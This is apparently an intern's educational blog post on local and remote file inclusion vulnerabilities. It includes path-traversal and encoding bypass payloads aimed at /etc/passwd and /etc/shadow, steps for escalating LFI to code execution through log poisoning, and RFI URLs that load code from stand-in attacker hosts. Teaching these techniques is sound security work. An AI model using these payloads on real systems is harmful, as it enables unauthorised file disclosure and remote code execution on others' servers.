File Inclusion Vulnerabilities
Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly given some interesting tasks, In my nineteenth task I was given to research about File Inclusion Vulnerability.
What is File Inclusion Vulnerability?
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
A file inclusion vulnerability allows an attacker to access unauthorised or sensitive files available on the web server or to execute malicious files on the web server by making use of the ‘include’ functionality.
The impact of this vulnerability can lead to malicious code execution on the server or reveal data present in sensitive files, code execution on the client side, etc.
What are the Different Types of File Inclusion Vulnerabilities?
There are mainly two types of File Inclusion Vulnerabilities:
- Local File Inclusion:
● Local file inclusion (also known as LFI) is the process of including files that are already locally present on the server, through the exploitation of vulnerable inclusion procedures implemented in the application.
● This vulnerability occurs when you enter the file or path of the file you want as an input, and as an response you get the content of that file.
● Mainly to increase the impact of this vulnerability look for files such as
a. /etc/passwd
b. /etc/shadow
c. /var/logs
d. C:\boot.ini
● Some Bypasses of LFI Protection:
- traversal sequences stripped non-recursively:
http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
- Null byte (%00)
http://example.com/index.php?page=../../../etc/passwd%00
- Encoding:
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
- From Existent Folder:
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
● Method to escalate LFI to RCE:
1. In this case look for file /proc/self/environ or any other type of log file which takes certain part of request
2. If any part of your request is stored, for eg: via a user agent header, upload the php code there.
3. In case of valid response the php code will be stored into the target server, and you can execute commands through it. Hence RCE via LFI.
2. Remote File Inclusion:
● RFI allows an attacker to include and execute a remotely hosted file using a script by including it in the attack page. The attacker can use RFI to run malicious code either on the client side or on the server.
● The impact of this attack can vary from temporary theft of stealing session tokens or data when the target is the client, to complete compromise of the system when the target is the application server.
● Normal: http://victimsite.com/index.php?page=http://resourcesite.com/normal.txt
RFI Vuln: http://victimsite.com/index.php?page=http://hackersite.com/evil.txt
● Some Bypass of RFI Protection:
- Back Slashes:
http://example.com/index.php?page=\\attacker.com\shared\mal.php
- Null Byte:
http://example.com/index.php?page=http://atacker.com/mal.php%00
This is all for today’s writeup.
Thanks For Reading 😊
Profile Links:
Twitter: https://twitter.com/SAPT01
LinkedIn: https://www.linkedin.com/in/prajit-sindhkar-3563b71a6/
Instagram: https://instagram.com/prajit_01?utm_medium=copy_link
BUG XS Official Website: https://www.bugxs.co/
